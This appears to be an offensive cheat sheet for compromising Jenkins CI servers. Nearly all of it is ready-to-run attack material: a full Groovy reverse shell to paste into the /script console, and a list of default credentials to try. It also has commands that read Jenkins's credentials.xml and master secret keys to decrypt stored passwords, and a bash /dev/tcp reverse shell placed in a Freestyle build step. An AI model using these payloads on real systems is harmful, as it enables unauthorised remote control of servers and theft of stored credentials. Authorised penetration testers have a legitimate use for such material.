Jenkins

What it is: Open-source CI/CD automation server. The /script console provides Groovy code execution which means instant RCE. Frequently found with weak or no authentication.

Default ports: 8080, 50000

Vuln research:


Access Jenkins Script Console

/script endpoint allows Groovy execution — Instant RCE if accessible

# Check if accessible (no auth or with found creds)
curl http://$IP:8080/script

Groovy reverse shell

Execute via Script Console — Full system shell

# Paste in /script console:
String host="$LHOST";int port=4444;String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}};p.destroy();s.close();

Jenkins default credentials

Common defaults to try — Often left unchanged

# Default creds:
# admin:admin
# admin:password
# jenkins:jenkins
# Check for signup enabled: http://$IP:8080/signup

Read credentials from Jenkins

Decrypt stored secrets — Jenkins stores creds in XML files

# If you have filesystem access:
cat /var/lib/jenkins/credentials.xml
cat /var/lib/jenkins/secrets/master.key
cat /var/lib/jenkins/secrets/hudson.util.Secret
# Use jenkins-decrypt tools to recover plaintext passwords

Create a Freestyle Project for RCE

Build step with shell command — Works with any Jenkins access

# New Item → Freestyle Project → Build → Execute shell
# Enter: bash -i >& /dev/tcp/$LHOST/4444 0>&1
# Click Build Now → catch shell